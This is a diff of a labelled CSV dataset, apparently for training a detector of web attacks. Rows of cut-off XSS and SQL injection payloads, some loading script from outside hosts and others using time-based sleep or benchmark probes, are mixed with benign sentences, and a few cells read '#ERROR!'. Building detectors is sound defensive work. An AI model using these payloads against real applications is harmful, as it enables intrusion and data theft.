onpointerenter=alert(1)>XSS</samp>,1,XSS,6201 -"1"" union all select null--",2,SQLi,16454 -"<code onmouseup=""alert(1)"">test</code>",1,XSS,8085 -1 and 6510 = ( select count ( * ) from sysusers as,2,SQLi,15048 -"-8981%"" ) ) ) union all select 4538,4538,4538,4538",2,SQLi,20478 -"<font onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,5683 -Modi and his Govts have no right to ban any of the,0,normal,26490 -1 ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ,2,SQLi,15654 +"{""id"":null,""firstName"":""Jessie"",""lastName"":""Lin"",""",0,normal,26773 +1' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ),2,SQLi,21960 +1'|| ( select 'ozoj' where 1608 = 1608,2,SQLi,15805 +Select trip.,0,normal,24708 +Join the group.,0,normal,22876 +<pre onpointerdown=alert(1)>XSS</pre>,1,XSS,6203 +"1' ) union all select null,null,null,null#",2,SQLi,16456 +<keygen onpointerup=alert(1)>XSS</keygen>,1,XSS,8087 +"1%"" ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ",2,SQLi,15050 +1%' union all select null#,2,SQLi,20476 +<b onblur=alert(1) tabindex=1 id=x></b><input auto,1,XSS,5685 +Modi nd his parents Govt have no the guts to ban a,0,normal,26487 +"1%"" rlike ( select * from ( select ( sleep ( 5 ) )",2,SQLi,15656 "{""id"":null,""firstName"":""Gabriel"",""lastName"":""Chen""",0,normal,27562 -"1"" ) ) as ubrg where 7318 = 7318 and 7331 = 6529--",2,SQLi,18065 -"<span onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,7558 -"<input onmousemove=""alert(1)"">test</input>",1,XSS,8570 -<button onRowsEnter=javascript:alert(1)>,1,XSS,9662 -1' ) as scnn where 9274 = 9274,2,SQLi,15735 -"<blockquote onmouseup=""alert(1)"">test</blockquote>",1,XSS,5962 -1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'zwyx' = 'zwy,2,SQLi,18988 -Thus it is possible to select a comparator from a ,0,normal,25291 -"<cite oncut=""alert(1)"" contenteditable>test</cite>",1,XSS,7869 -><img src=x onerror=javascript:alert('A')>,1,XSS,1270 --5217'|| ( select 'juen' from dual where 7336 = 73,2,SQLi,13734 -"1' ) ) ) and elt ( 9041 = 6421,6421 ) and ( ( ( 'i",2,SQLi,12698 -#ERROR!,2,SQLi,22527 -"<frameset oncopy=""alert(1)"" contenteditable>test</",1,XSS,6999 -||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND,2,SQLi,11284 -"<video onclick=""alert(1)"">test</video>",1,XSS,8670 -1,0,normal,26676 -"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,18668 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20117 -"<D3""<""/OncLick=""1>[confirm``]""<"">z",1,XSS,9046 -Where's the perfect spot to unwind?,0,normal,23936 -"{""id"":null,""firstName"":""Huang Soon"",""lastName"":""Th",0,normal,27199 -floor,0,normal,23209 -"<center ondblclick=""alert(1)"">test</center>",1,XSS,5128 -<video+onerror='javascript:MouseEvent=function+Mou,1,XSS,9328 -"<div datafld=""b"" dataformatas=""html"" datasrc=""#X"">",1,XSS,1546 +"1 ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ",2,SQLi,18067 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7560 +<style>:target {color: red;}</style><aside id=x st,1,XSS,8572 +<button onSeek=javascript:alert(1)>,1,XSS,9664 +"1%' or extractvalue ( 1297,concat ( 0x5c,0x7171706",2,SQLi,15737 +<u onpointerleave=alert(1)>XSS</u>,1,XSS,5964 +"1"" ) as zjwu where 9963 = 9963 or 8514 = benchmark",2,SQLi,18990 +It Is Readily Attainable At Any Time In A Modern L,0,normal,25960 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7871 +"><img src=x onerror=javascript:alert((""A""))>",1,XSS,1271 +"1"" ) as ssbz where 8885 = 8885 union all select nu",2,SQLi,13736 +"1"" where 2035 = 2035 and 3824 = benchmark ( 500000",2,SQLi,12700 +"SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(20",2,SQLi,22524 +"<td onkeyup=""alert(1)"" contenteditable>test</td>",1,XSS,7001 +#ERROR!,2,SQLi,11286 +<svg><s onload=alert(1)></s>,1,XSS,8672 +1,0,normal,26673 +1%' ) ) and 4595 = 4595#,2,SQLi,18670 +1'|| ( select 'gtri' from dual where 7097 = 7097 a,2,SQLi,20119 +<D3/OnpOinTeReENter=confirm``>click here,1,XSS,9048 +"{""id"":null,""name"":""molecular explanation""}",0,normal,26927 +"{""id"":null,""name"":""soft""}",0,normal,27197 +"{""id"":null,""name"":""rest""}",0,normal,26789 +"<style>@keyframes slidein {}</style><ul style=""ani",1,XSS,5130 +<x %6Fnxxx=1,1,XSS,9330 +[\xC0][\xBC]script>document.vulnerable=true;[\xC0],1,XSS,1547 "<IMG SRC=""jav ascript:javascript:alert(1);"">",1,XSS,740 -"select * from users where id = 1 or ""{@"" or 1 = 1 ",2,SQLi,11573 -""",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-",2,SQLi,10876 -"<;A HREF="";http://ha.ckers.org@google"";>;XSS<;/A>;",1,XSS,1675 -"select pg_sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,16122 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2568 -<command onpointerup=alert(1)>XSS</command>,1,XSS,6985 -"<details onmouseleave=""alert(1)"">test</details>",1,XSS,6796 -"1%"" ) ) ) or 5286 = ( select count ( * ) from all_",2,SQLi,19903 -<font onfocusout=alert(1) tabindex=1 id=x></font><,1,XSS,4733 -"<SCRIPT SRC=""%(jpg)s""></SCRIPT>",1,XSS,774 -1' ) ) rlike ( select * from ( select ( sleep ( 5 ,2,SQLi,17250 -URL=javascript:alert(''),1,XSS,8522 -Select run.,0,normal,24641 -"1 or 8384 = like ( 'abcdefg',upper ( hex ( randomb",2,SQLi,17026 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11575 +"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-",2,SQLi,10878 +"<;A HREF="";http://google:ha.ckers.org"";>;XSS<;/A>;",1,XSS,1676 +1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ,2,SQLi,16124 +"<multicol draggable=""true"" ondragstart=""alert(1)"">",1,XSS,2569 +<input onpointerout=alert(1)>XSS</input>,1,XSS,6987 +"<frame onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,6798 +select sleep ( 5 ) and ( 'vwmx' = 'vwmx,2,SQLi,19905 +"<style>@keyframes slidein {}</style><time style=""a",1,XSS,4735 +"<SCRIPT SRC=""%(jpg)s""></SCRIPT>",1,XSS,774 +1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ,2,SQLi,17252 +"<dir onmousemove=""alert(1)"">test</dir>",1,XSS,8524 +Select depart.,0,normal,24638 +waitfor delay '0:0:5'# ogzq,2,SQLi,17028 <a id=x tabindex=1 onfocus=alert(1)></a>,1,XSS,19 -"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""",1,XSS,2245 -<center id=x tabindex=1 onfocusin=alert(1)></cente,1,XSS,3204 -"<param onmouseenter=""alert(1)"">test</param>",1,XSS,7289 -<figure id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,5205 -"-8810' ) or make_set ( 9354 = 9354,7185 ) and ( 'p",2,SQLi,13709 -"<b onbeforecut=""alert(1)"" contenteditable>test</b>",1,XSS,6924 -"{""id"":null,""name"":""shine""}",0,normal,27569 -Fetch records where available.,0,normal,23315 -select * from users where id = 1 or $ 1 = 1 union ,2,SQLi,11999 -%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) A,2,SQLi,11198 -"1"" and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,13969 -Randomly select cards.,0,normal,24806 -1 ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70,2,SQLi,12922 -"<pre onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,6666 -"<nextid onkeypress=""alert(1)"" contenteditable>test",1,XSS,3241 -"1"" ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 1",2,SQLi,16930 -<embed id=x tabindex=1 ondeactivate=alert(1)></emb,1,XSS,3310 -)) or sleep(5)=,2,SQLi,10359 +<nobr onpointerdown=alert(1)>XSS</nobr>,1,XSS,2246 +"<a onkeydown=""alert(1)"" contenteditable>test</a>",1,XSS,3206 +<svg><meter onload=alert(1)></meter>,1,XSS,7291 +<style>:target {color:red;}</style><nobr id=x styl,1,XSS,5207 +1' ) where 9159 = 9159,2,SQLi,13711 +"<i oncontextmenu=""alert(1)"">test</i>",1,XSS,6926 +"{""id"":null,""name"":""thou bag""}",0,normal,27465 +Show me where it's saved.,0,normal,23312 +"x' AND members.email IS NULL,",2,SQLi,12001 +) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AN,2,SQLi,11200 +-2896' ) ) as wisk where 1030 = 1030 union all sel,2,SQLi,13971 +I'm planning to pick up some fresh groceries.,0,normal,23833 +"1"" ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76",2,SQLi,12924 +<html onpointerover=alert(1)>XSS</html>,1,XSS,6668 +"<article onmousemove=""alert(1)"">test</article>",1,XSS,3243 +select ( case when ( 5423 = 7706 ) then 5423 else ,2,SQLi,16932 +"<nobr draggable=""true"" ondrag=""alert(1)"">test</nob",1,XSS,3312 +;waitfor delay '0:0:5'--,2,SQLi,10361 "<video src=1 href=1 onerror=""javascript:alert(1)"">",1,XSS,364 -"1%' ) union all select null,null,null,null,null,nu",2,SQLi,20108 -"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(",2,SQLi,11018 -select * from users where id = 1 + \+*$ union sele,2,SQLi,11790 -<style>:target {color: red;}</style><rtc id=x styl,1,XSS,4727 -<dl onpointerover=alert(1)>XSS</dl>,1,XSS,8739 -1' ) ) as nsfx where 9553 = 9553 rlike sleep ( 5 ),2,SQLi,19325 --2233' or ( 1807 = 7274 ) *7274,2,SQLi,16856 -"<;STYLE>;@im\port';\ja\vasc\ript:alert("";XSS"";)';;",1,XSS,1642 -"Its sixth early-stage fund, True Ventures VI LP, c",0,normal,25937 -"<IMG SRC=x onbeforeprint=""alert(String.fromCharCod",1,XSS,1173 -"<base onpaste=""alert(1)"" contenteditable>test</bas",1,XSS,4501 -1 and 5556 = ( select count ( * ) from all_users t,2,SQLi,13466 -Select and Claim Your Favorite Glass Everybody nee,0,normal,25648 -"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,21644 -<q id=x tabindex=1 ondeactivate=alert(1)></q><inpu,1,XSS,3365 -1' ) as qqyz where 2274 = 2274,2,SQLi,20586 -"-6076"" ) ) or 8277 = 4757",2,SQLi,12666 -&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha,1,XSS,1411 -1'|| ( select 'ersu' where 4123 = 4123 and 8312 = ,2,SQLi,12480 -"-4711%"" ) ) union all select 6737,6737,6737,6737#",2,SQLi,22121 -"<menuitem onmouseenter=""alert(1)"">test</menuitem>",1,XSS,6667 -SELECT pg_sleep(5);,2,SQLi,11333 -"-9932"" union all select 4049,4049,4049--",2,SQLi,17200 -"-2167' ) ) ) union all select 3804,3804,3804,3804,",2,SQLi,14901 -<li onblur=alert(1) tabindex=1 id=x></li><input au,1,XSS,2132 -"<cite onkeyup=""alert(1)"" contenteditable>test</cit",1,XSS,1798 -"1 ) or elt ( 6272 = 6272,sleep ( 5 ) )",2,SQLi,15379 -<td onpointerout=alert(1)>XSS</td>,1,XSS,7728 -<svg><template onload=alert(1)></template>,1,XSS,4576 -<keygen onpointermove=alert(1)>XSS</keygen>,1,XSS,5191 -<input autofocus onfocus=alert(1)>,1,XSS,8168 -1' ) where 6092 = 6092,2,SQLi,19507 -"1%"" or 8421 = ( select count ( * ) from generate_s",2,SQLi,15733 -"1"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,12411 +"1"" ) as jngl where 8384 = 8384 and 4580 = 1718--",2,SQLi,20110 +"""),(select%20if(count(*)!=-1,benchmark(3000000,MD5",2,SQLi,11020 +"select * from users where id = 1 or "" ) ;"" or 1 = ",2,SQLi,11792 +"<wbr ondblclick=""alert(1)"">test</wbr>",1,XSS,4729 +"<source onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,8741 +"1, ( select 6825 from ( select count ( * ) ,concat",2,SQLi,19327 +"1%' ) or ( select 9173 from ( select count ( * ) ,",2,SQLi,16858 +"<;IMG SRC="";jav&#x09;ascript:alert(';XSS';);"";>;",1,XSS,1643 +"Just add ingredients, select the cycle, and push t",0,normal,25934 +"<IMG SRC=x onbeforeunload=""alert(String.fromCharCo",1,XSS,1174 +<acronym onpointermove=alert(1)>XSS</acronym>,1,XSS,4503 +-2351 ) ) as xdqn where 4019 = 4019 or 8571 = 8571,2,SQLi,13468 +Select and justify a suitable means of data analys,0,normal,25645 +Delete the unnecessary code.,0,normal,22589 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3367 +Shirkers premieres October 26 on Netflix and in se,0,normal,25555 +"-6680"" ) ) ) union all select 2564,2564,2564,2564,",2,SQLi,12668 +&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;,1,XSS,1412 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,12482 +"Click on your profile picture, and then select ""Yo",0,normal,26277 +<canvas onpointerenter=alert(1)>XSS</canvas>,1,XSS,6669 +1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337,2,SQLi,11335 +1' and 8312 = dbms_pipe.receive_message ( chr ( 69,2,SQLi,17202 +1 ) as rlft where 1670 = 1670 waitfor delay '0:0:5,2,SQLi,14903 +"<dl onkeydown=""alert(1)"" contenteditable>test</dl>",1,XSS,2133 +<u onblur=alert(1) tabindex=1 id=x></u><input auto,1,XSS,1799 +1' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ,2,SQLi,15381 +"<embed onmouseup=""alert(1)"">test</embed>",1,XSS,7730 +"<BR SIZE=""&{alert('')}"">",1,XSS,4578 +"<blink oncut=""alert(1)"" contenteditable>test</blin",1,XSS,5193 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8170 +"-3035"" ) union all select 7912,7912,7912#",2,SQLi,19509 +1' ) as scnn where 9274 = 9274,2,SQLi,15735 +1' and 4386 = utl_inaddr.get_host_address ( chr ( ,2,SQLi,12413 "<a href=""\xE2\x80\x86javascript:javascript:alert(1",1,XSS,524 -"<article onbeforecut=""alert(1)"" contenteditable>te",1,XSS,3090 -Where's the SQL knowledge?,0,normal,23396 -select * from users where id = '1' union select $ ,2,SQLi,11620 -"<nextid onclick=""alert(1)"">test</nextid>",1,XSS,1997 -1'+ ( select 'ndpx' where 4061 = 4061 or 7417 = ( ,2,SQLi,17917 -"select * from users where id = 1 or ""%,"" or 1 = 1 ",2,SQLi,11820 -"1"" ) as fcrx where 2929 = 2929 and 2820 = 5133",2,SQLi,19106 -"select * from users where id = 1 or ""??"" or 1 = 1 ",2,SQLi,11603 -"<rp onclick=""alert(1)"">test</rp>",1,XSS,2832 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8270 -"<head onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,7490 -"-9408%"" ) ) union all select 1841,1841,1841,1841,1",2,SQLi,22331 -Filter the spam emails.,0,normal,22648 -Select the best course for your studies.,0,normal,24204 -/></a></><img src=1.gif onerror=alert(1)>window.al,1,XSS,1300 -"<cite onkeydown=""alert(1)"" contenteditable>test</c",1,XSS,6274 -"<big onpaste=""alert(1)"" contenteditable>test</big>",1,XSS,5500 -"<object onmousemove=""alert(1)"">test</object>",1,XSS,6448 -"1%"" and 9254 = ( select count ( * ) from rdb$field",2,SQLi,15614 -1%' ) and 6537 = dbms_pipe.receive_message ( chr (,2,SQLi,15127 -Where's the SQL documentation?,0,normal,23410 -"-5732' ) union all select 7614,7614,7614,7614--",2,SQLi,17865 -"-5810 union all select 6307,6307,6307,6307,6307,63",2,SQLi,17986 -0x730065006c0065006300740020004000400076006500 ...,2,SQLi,10152 -"<figcaption onbeforecut=""alert(1)"" contenteditable",1,XSS,7068 -Randomly select a movie.,0,normal,24422 -"{""id"":null,""firstName"":""Caren"",""lastName"":""Lim"",""a",0,normal,26769 -"-2316%' union all select 8636,8636,8636,8636,8636,",2,SQLi,20046 -"1"" ) where 2702 = 2702 and 6537 = dbms_pipe.receiv",2,SQLi,15117 -"<embed onbeforecut=""alert(1)"" contenteditable>test",1,XSS,8748 -<ul onpointerover=alert(1)>XSS</ul>,1,XSS,5681 -AND 1 = utl_inaddr.get_host_address ( ( SELECT SYS,2,SQLi,11550 -1 ) as nkjo where 8462 = 8462 union all select nul,2,SQLi,16782 -<style><!--</style><script>document.vulnerable=tru,1,XSS,1538 -1' ) as ohcs where 9588 = 9588 or elt ( 6272 = 627,2,SQLi,18891 +<noframes onpointerenter=alert(1)>XSS</noframes>,1,XSS,3091 +Select data where relevant.,0,normal,23393 +0x77616974666F722064656C61792027303A303A31302700 e,2,SQLi,11622 +"<ins onkeyup=""alert(1)"" contenteditable>test</ins>",1,XSS,1998 +1' ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ,2,SQLi,17919 +select * from users where id = 1 or ( \ ) = 1 unio,2,SQLi,11822 +select sleep ( 5 ) and ( ( ( 'iwwa' like 'iwwa,2,SQLi,19108 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11605 +<figcaption id=x tabindex=1 onactivate=alert(1)></,1,XSS,2833 +"<kbd onkeydown=""alert(1)"" contenteditable>test</kb",1,XSS,8272 +"<output onclick=""alert(1)"">test</output>",1,XSS,7492 +select ( case when ( 7254 = 5901 ) then 1 else 725,2,SQLi,22329 +Order a classic burger.,0,normal,22645 +Select a book for your bookshelf.,0,normal,24201 +"<div style=""x:expression((window.r==1)?'':eval('r=",1,XSS,1301 +"<sub draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,6276 +"<optgroup draggable=""true"" ondragend=""alert(1)"">te",1,XSS,5502 +<style>:target {color: red;}</style><s id=x style=,1,XSS,6450 +1%' ) and 8407 = ( select count ( * ) from generat,2,SQLi,15616 +( select ( case when ( 6461 = 1802 ) then 1 else c,2,SQLi,15129 +Where's your SQL documentation?,0,normal,23407 +-4157' ) or 4493 = utl_inaddr.get_host_address ( c,2,SQLi,17867 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,17988 +%20or%20'x'='x,2,SQLi,10154 +<slot id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,7070 +"So, astrology might not help you select the perfec",0,normal,25536 +Select instruct.,0,normal,24715 +1' ) and sleep ( 5 ),2,SQLi,20048 +-8187' ) ) ) or 1698 = 2823#,2,SQLi,15119 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8750 +"<font onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,5683 +"\',desc users, --",2,SQLi,11552 +"-4822"" or 4493 = utl_inaddr.get_host_address ( chr",2,SQLi,16784 +<<script>document.vulnerable=true;</script>,1,XSS,1539 +1'+ ( select 'qmtx' where 6992 = 6992 and 8148 = l,2,SQLi,18893 "{""id"":null,""firstName"":""Kiatyun"",""lastName"":""Tan"",",0,normal,27512 -"( select count ( * ) from generate_series ( 1,5000",2,SQLi,22440 -"<output draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,5556 -"<figcaption oncontextmenu=""alert(1)"">test</figcapt",1,XSS,3011 -1' ) ) as dago where 9788 = 9788,2,SQLi,17108 -"1"" ) where 7840 = 7840 union all select null,null#",2,SQLi,16685 -The Utilities Select Sector SPDR Fund (XLU) was up,0,normal,25360 -<option onfocusout=alert(1) tabindex=1 id=x></opti,1,XSS,7329 -"1"" where 8727 = 8727",2,SQLi,12487 -<frameset onpointerleave=alert(1)>XSS</frameset>,1,XSS,4186 -"Drawing on these disciplines, a student may choose",0,normal,26228 -1' ) ) and 2832 = 4165--,2,SQLi,15147 -"/</title/'/</style/</script/</textarea/--><p"" oncl",1,XSS,9550 -select * from users where id = 1 <@ or 1 = 1 -- 1,2,SQLi,11497 -1' or 7552 = ( select count ( * ) from rdb$fields ,2,SQLi,13648 -"Earlier in 2019, Lyft added ""green mode"" in select",0,normal,26219 -Select your watch.,0,normal,24983 -Boston Dynamics has started leasing Spot out to se,0,normal,26319 -1%' ) and 8514 = ( select count ( * ) from domain.,2,SQLi,13148 -<nextid onpointerout=alert(1)>XSS</nextid>,1,XSS,4583 -Autonomous weapons select and fire on targets with,0,normal,26338 -"<xmp ondblclick=""alert(1)"">test</xmp>",1,XSS,7368 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10682 +"1%"" ) ) and 2716 = ( select count ( * ) from sysus",2,SQLi,22437 +<caption id=x tabindex=1 onactivate=alert(1)></cap,1,XSS,5558 +"<sub draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,3012 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,17110 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,16687 +The whitelisted version will be an option parents ,0,normal,25357 +"<img oncopy=""alert(1)"" contenteditable>test</img>",1,XSS,7331 +1'|| ( select 'jpso' from dual where 9357 = 9357 o,2,SQLi,12489 +"<meter onbeforecut=""alert(1)"" contenteditable>test",1,XSS,4188 +"Dubbed ""?Mixcloud Select,"" the new feature lets li",0,normal,26225 +1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ,2,SQLi,15149 +"/</title/'/</style/</script/--><p"" onclick=alert()",1,XSS,9552 +select * from users where id = 1 <@$_ union select,2,SQLi,11499 +-7501'+ ( select uloc where 3089 = 3089 union all ,2,SQLi,13650 +"Elijah Cummings, the top Democrat on the select Co",0,normal,26216 +Select encourage.,0,normal,24734 +Burr serves as chairman of the Senate Select Commi,0,normal,26316 +-5967 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ),2,SQLi,13150 +"<menuitem oncut=""alert(1)"" contenteditable>test</m",1,XSS,4585 +"Be careful which breed you select, because althoug",0,normal,26335 +"<optgroup onpaste=""alert(1)"" contenteditable>test<",1,XSS,7370 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10684 "<iframe src=""javascript:alert(1)"">",1,XSS,144 -"{""id"":null,""name"":""want generally""}",0,normal,27338 -1 ) as ezje where 5234 = 5234 and make_set ( 8403 ,2,SQLi,21107 -You will be performing many quick stops and starts,0,normal,25060 -<x onclick=alert(1)>click this!,1,XSS,9345 -"1%' ) or 6979 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,14142 -"<IMG SRC=x ondrop=""alert(String.fromCharCode(88,83",1,XSS,1213 -1' ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,20415 -You can select multiple bookmarks to move at once ,0,normal,25080 -<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x7,1,XSS,9262 -1' ) and 5556 = ( select count ( * ) from all_user,2,SQLi,14087 -Early in the 15th century their residence was fixe,0,normal,26218 -Where to execute the query?,0,normal,23471 -"1' ) ) and make_set ( 8403 = 8403,8899 ) and ( ( '",2,SQLi,20168 -"{""id"":null,""name"":""Tangrowth""}",0,normal,27381 -"<a onclick=""alert(1)"">test</a>",1,XSS,5995 -"1"" ) ) and exp ( ~ ( select * from ( select concat",2,SQLi,20152 -<time onpointerenter=alert(1)>XSS</time>,1,XSS,4273 -1%' and 6414 = ( select count ( * ) from rdb$field,2,SQLi,14924 -"1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a",2,SQLi,20614 +"{""id"":null,""firstName"":""Ricky"",""lastName"":""Lee"",""s",0,normal,27337 +"1"" ) ) as wfne where 8933 = 8933",2,SQLi,21105 +"You select your ISO, select your USB drive, and cl",0,normal,25057 +<x oncopy=alert(1)>copy this!,1,XSS,9347 +"-4927' ) ) union all select 1924,1924#",2,SQLi,14144 +"<IMG SRC=x onscroll=""alert(String.fromCharCode(88,",1,XSS,1214 +1' in boolean mode ) and ( select * from ( select ,2,SQLi,20413 +You can select the metering from spot to center we,0,normal,25077 +<script> function b() { return Safe.get(); } alert,1,XSS,9264 +1%' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( ,2,SQLi,14089 +"Elizabeth Street Ventures, Maywic Select Investmen",0,normal,26215 +Where's the data source?,0,normal,23468 +"-5845' ) ) ) union all select 3595,3595,3595,3595,",2,SQLi,20170 +Where's the psychiatrist's office?,0,normal,23662 +"<picture><source srcset=""validimage.png""><image on",1,XSS,5997 +1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) |,2,SQLi,20154 +"<div onmousedown=""alert(1)"">test</div>",1,XSS,4275 +"1"" ) and char ( 111 ) ||char ( 77 ) ||char ( 121 )",2,SQLi,14926 +Select your vow.,0,normal,24953 <frameset onload=javascript:javascript:alert(1)></,1,XSS,787 -""")))) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11050 -1 ) ) as goar where 2405 = 2405 and 5927 = 9731--,2,SQLi,14786 -1' ) where 9317 = 9317 or 6793 = ( select 6793 fro,2,SQLi,18101 -1 ) ) ) and 4595 = 4595#,2,SQLi,21347 -"1' where 4272 = 4272 union all select null,null,nu",2,SQLi,15793 -1' ) as ibqr where 5372 = 5372 and 8312 = dbms_pip,2,SQLi,12380 -"<object draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,7854 -"In either theory, conscience may be understood as ",0,normal,26010 -Delete the old bookmarks from your browser.,0,normal,22927 -1'+ ( select rdpe where 6553 = 6553 or elt ( 6272 ,2,SQLi,13017 -"1"" where 3247 = 3247 or 1022 = ( select count ( * ",2,SQLi,14874 -"1 ) where 7600 = 7600 union all select null,null,n",2,SQLi,14260 -( select * from ( select ( sleep ( 5 ) ) ) srmq ),2,SQLi,19290 -<IMG SRC=javascript:alert(&quot;&quot;)>,1,XSS,4627 -1'|| ( select 'ifts' from dual where 6329 = 6329,2,SQLi,17381 -"-8966"" ) ) ) or 1628 = 2712",2,SQLi,20592 -That's why I select places like Washington Heights,0,normal,25489 -"<svg><script href=""data:text/javascript,alert(1)"" ",1,XSS,155 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11469 -"1"" ) where 9656 = 9656 and sleep ( 5 ) --",2,SQLi,21597 -"<dfn oncontextmenu=""alert(1)"">test</dfn>",1,XSS,8056 -Plant some vibrant flowers in your garden.,0,normal,22961 -"<slot onmouseover=""alert(1)"">test</slot>",1,XSS,8927 -"<script>import('data:text/javascript,alert(1)')</s",1,XSS,157 -1' ) where 4786 = 4786 or ( select 2* ( if ( ( sel,2,SQLi,22450 -<blink onblur=alert(1) tabindex=1 id=x></blink><in,1,XSS,3086 -Filter rows where relevant.,0,normal,23374 -"<script SRC=""http://www.securitycompass.com/xss.jp",1,XSS,1553 -1' ) as mpsf where 3348 = 3348,2,SQLi,13394 -`'><script>\x0Djavascript:alert(1)</script>,1,XSS,557 -<optgroup onpointerleave=alert(1)>XSS</optgroup>,1,XSS,2149 -select * from users where id = 1 or \+<\ or 1 = 1 ,2,SQLi,11988 -"<a href=""\xE2\x80\x88javascript:javascript:alert(1",1,XSS,496 -Let's explore where the river flows into.,0,normal,23821 -<mark id=x tabindex=1 onfocus=alert(1)></mark>,1,XSS,2322 --4339 ) where 7178 = 7178 or 4008 = 7232,2,SQLi,17297 -<svg><animate xlink:href=#xss attributeName=href f,1,XSS,152 -"{""id"":null,""firstName"":"""",""lastName"":"""",""specialti",0,normal,26775 -Let's explore where the river flows from.,0,normal,23761 -in,0,normal,23138 -"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://hacke",1,XSS,1365 -"1%"" ) ) ) and make_set ( 8191 = 7813,7813 ) and ( ",2,SQLi,18123 -"-7543' ) ) ) or 1 group by concat ( 0x7171706a71, ",2,SQLi,19386 -1'+ ( select 'myrb' where 3622 = 3622 and 6510 = (,2,SQLi,18800 -1 ) as khkv where 2944 = 2944 and ( select 9067 fr,2,SQLi,15697 -1'|| ( select 'ttyt' where 3751 = 3751 or 7417 = (,2,SQLi,19268 -"<rtc onmousemove=""alert(1)"">test</rtc>",1,XSS,3721 -"<base oncopy=""alert(1)"" contenteditable>test</base",1,XSS,7128 -"javascript:alert()//\"";alert();/*-/*`/*\`/*'/*""/**",1,XSS,9534 -"-2840' ) ) ) union all select 3025,3025,3025,3025-",2,SQLi,17273 -"<element onkeypress=""alert(1)"" contenteditable>tes",1,XSS,5472 -"-9098' union all select 3476,3476,3476,3476,3476,3",2,SQLi,19586 -"1"" where 4319 = 4319",2,SQLi,22263 -"<kbd draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,4824 -"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,15480 -1 ) where 7026 = 7026,2,SQLi,12654 -"1"" and elt ( 4249 = 4249,7259 ) and ""kgtz"" like ""k",2,SQLi,16728 -"<figure onclick=""alert(1)"">test</figure>",1,XSS,4137 -Where's the library?,0,normal,23507 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,19573 --3540 where 7302 = 7302 or 4493 = utl_inaddr.get_h,2,SQLi,18608 --7111' or ( 8459 = 8459 ) *4906,2,SQLi,12389 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2122 -<style>:target {color:red;}</style><summary id=x s,1,XSS,6859 -žscriptualert(EXSSE)ž/scriptu,1,XSS,993 -"-3885 ) where 2387 = 2387 union all select 2387,23",2,SQLi,13274 -"1%' ) ) ) union all select null,null,null,null--",2,SQLi,15872 -"1' ) union all select 